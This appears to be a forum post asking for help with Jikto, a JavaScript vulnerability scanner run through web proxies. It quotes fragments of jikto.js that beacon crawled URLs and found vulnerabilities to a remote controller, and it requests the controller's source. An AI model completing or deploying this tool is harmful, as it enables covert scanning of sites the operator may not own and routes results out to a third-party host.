I got jikto and everything
I edited the jikto.js to direct to my control.txt
the-cloak banned me within seconds so im using google translate even though im testing pages in the same domain
with firebug i can see for example
[
www.testdomainiamusing.com]
looking at the code in jikto.js:
function reportURL(method, url) {
var i = new Image();
i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);
}
function reportVuln(method, url, sev, title, req, resp) {
var i = new Image();
i.src = GUIURL + "2&url="
which means that unless I see "http://www.testdomainiamusing.com/jikto/control.txt2&url="
it did not find a vulnerability
i guess that's the way to do it without a controller, but someone above me said they wrote up a controller, can you post the source to the controller?
or maybe im using the tool incorrectly?